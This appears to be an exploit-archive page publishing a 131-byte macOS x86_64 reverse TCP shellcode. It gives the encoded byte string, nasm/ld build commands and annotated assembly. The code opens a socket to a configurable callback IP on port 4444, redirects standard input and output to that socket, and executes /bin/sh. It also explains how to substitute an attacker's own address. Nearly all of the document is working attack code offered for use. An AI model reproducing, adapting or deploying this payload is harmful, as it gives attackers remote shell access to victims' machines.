[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : OSX/Intel reverse_tcp shell x86_64 - 131 bytes
# Published : 2011-04-29
# Author :
# Previous Title : Polymorphic /bin/sh x86 linux shellcode
# Next Title : 125 bind port to 6778 XOR encoded polymorphic linux shellcode .
;osx x64 reverse tcp shellcode (131 bytes)
;Jacob Hammack
;jacob.hammack@hammackj.com
;http://www.hammackj.com
;
;props to http://www.thexploit.com/ for the blog posts on x64 osx asm
;I borrowed some of his code
;
;#OSX reverse tcp shell (131 bytes)
;#replace FFFFFFFF around byte 43 with the call back ip in hex
;#replace 5C11 around byte 39 with a new port current is 4444
;shellcode =
;"x41xB0x02x49xC1xE0x18x49x83xC8x61x4Cx89xC0x48" +
;"x31xD2x48x89xD6x48xFFxC6x48x89xF7x48xFFxC7x0F" +
;"x05x49x89xC4x49xBDx01x01x11x5CxFFxFFxFFxFFx41" +
;"xB1xFFx4Dx29xCDx41x55x49x89xE5x49xFFxC0x4Cx89" +
;"xC0x4Cx89xE7x4Cx89xEEx48x83xC2x10x0Fx05x49x83" +
;"xE8x08x48x31xF6x4Cx89xC0x4Cx89xE7x0Fx05x48x83" +
;"xFEx02x48xFFxC6x76xEFx49x83xE8x1Fx4Cx89xC0x48" +
;"x31xD2x49xBDxFFx2Fx62x69x6Ex2Fx73x68x49xC1xED" +
;"x08x41x55x48x89xE7x48x31xF6x0Fx05"
;nasm -f macho reverse_tcp.s -o reverse_tcp.o
;ld -o reverse_tcp -e start reverse_tcp.o
BITS 64
section .text
global start
start:
mov r8b, 0x02 ; unix class system calls = 2
shl r8, 24 ; shift left 24 to the upper order bits
or r8, 0x61 ; socket is 0x61
mov rax, r8 ; put socket syscall # into rax
;Socket
xor rdx, rdx ; zero out rdx
mov rsi, rdx ; AF_NET = 1
inc rsi ; rsi = AF_NET
mov rdi, rsi ; SOCK_STREAM = 2
inc rdi ; rdi = SOCK_STREAM
syscall ; call socket(SOCK_STREAM, AF_NET, 0);
mov r12, rax ; Save the socket
;Sock_addr
mov r13, 0xFFFFFFFF5C110101 ; IP = FFFFFFFF, Port = 5C11(4444)
mov r9b, 0xFF ; The sock_addr_in is + FF from where we need it
sub r13, r9 ; So we sub 0xFF from it to get the correct value and avoid a null
push r13 ; Push it on the stack
mov r13, rsp ; Save the sock_addr_in into r13
;Connect
inc r8 ; Connect = 0x62, so we inc by one from the previous syscall
mov rax, r8 ; move that into rax
mov rdi, r12 ; move the saved socket fd into rdi
mov rsi, r13 ; move the saved sock_addr_in into rsi
add rdx, 0x10 ; add 0x10 to rdx
syscall ; call connect(rdi, rsi, rdx)
sub r8, 0x8 ; subtract 8 from r8 for the next syscall dup2 0x90
xor rsi, rsi ; zero out rsi
dup:
mov rax, r8 ; move the syscall for dup2 into rax
mov rdi, r12 ; move the FD for the socket into rdi
syscall ; call dup2(rdi, rsi)
cmp rsi, 0x2 ; check to see if we are still under 2
inc rsi ; inc rsi
jbe dup ; jmp if less than 2
sub r8, 0x1F ; setup the exec syscall at 0x3b
mov rax, r8 ; move the syscall into rax
;exec
xor rdx, rdx ; zero out rdx
mov r13, 0x68732f6e69622fFF ; '/bin/sh' in hex
shr r13, 8 ; shift right to create the null terminator
push r13 ; push to the stack
mov rdi, rsp ; move the command from the stack to rdi
xor rsi, rsi ; zero out rsi
syscall ; call exec(rdi, 0, 0)